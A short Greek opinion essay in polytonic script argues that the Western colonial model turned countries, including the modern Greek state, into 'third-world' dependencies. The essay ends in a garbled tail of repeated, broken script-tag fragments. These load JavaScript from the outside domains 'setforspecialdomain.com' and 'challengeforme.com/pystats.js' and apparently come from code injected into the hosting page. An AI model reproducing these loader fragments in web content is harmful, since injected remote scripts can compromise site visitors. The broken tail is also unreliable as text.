Παλινβαρβαρισμοῦ παράδειγμα, του Αλέξιου Ραφαηλίδη

1

Ἀξιοποιών τὸν χλευαστικὸ ὅρο περὶ τοῦ ὅτι «ἔχουμε μεταβληθεῖ σὲ τριτοκοσμικὴ χώρα» ὡς εὐκαιρία γιὰ σχόλιο περὶ τοῦ θέματος. Τί ἐστί «τριτοκοσμικὴ» χώρα καὶ ἀπὸ ποιά διαδικασία προκύπτει.

Γράφει ο Αλέξιος Ραφαηλίδης

Ὁ ὅρος εἶναι ἀναφορικὸς μὲ σημεῖο ἀναφορᾶς τὴν Δύση καὶ τὴν βουλιμικὴ ἐπεκτατικὴ της.
Πράγματι ἡ Δύση κατέστρεψε τὴν ἰσορροπία τῶν χωρῶν τῆς περιοχῆς καὶ τοποθέτησε αὐτὲς σὲ τροχιὰ ὑπανάπτυξης – ἐνέργεια κατακτητική ἡ ὁποία ἀποτελεῖ «τριτοκοσμικὸ» φαινόμενο ὑπανάπτυξης.
Ἤτοι ἐπέβαλλε στὶς χῶρες αὐτὲς νὰ ἀναπτυχθοῦν ὄχι βάσει τῶν ἀναγκῶν τους, ἀλλὰ βάσει τῶν ἀναγκῶν ἑνὸς ἐξωτερικοῦ κέντρου (τῆς Δύσης).

Τὸ ἀποτέλεσμα εἶναι ἡ χώρα νὰ ἀρχίση νὰ περιστρέφεται περὶ τοῦ ἐξωτερικοῦ κέντρου στὴν τροχιὰ τοῦ ἀποικισμοῦ της ἔχοντας τάση νὰ δυτικοποιηθῆ μὲ τὴν ἐλπίδα νὰ ξεφύγη ἀπὸ τὴν ἐξάρτηση.
Ἀείρροος κίνηση – φαῦλος κύκλος!

Ὄχι μόνον καθίσταται ἀδύνατον νὰ ξεφύγη ἡ χώρα ἀπὸ τὸν σφυγτὸ «ἐναγγαλισμὸ» τῆς Δύσης, ἀλλὰ τὸ δυτικὸ αὐτὸ μοντέλο τῶν χωρῶν – θυμάτων σταδιακὰ ἐπεκτίνεται καὶ ἐπιβάλλεται ὡς πρότυπο, μία διαδικασία «δυτικοποίησης» καὶ «ὑποδούλωσης» ποὺ ὡς καρκίνος ἔχει μολύνει ὁλόκληρο τὸν πλανήτη.
Τὸ σημερινὸ ἑλλαδικὸ κρατίδιο ἀποτελεῖ χαρακτηριστικό παράδειγμα «τριτοκοσμικῆς» χώρας ἐδῶ καὶ 180 ἔτη.

1___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >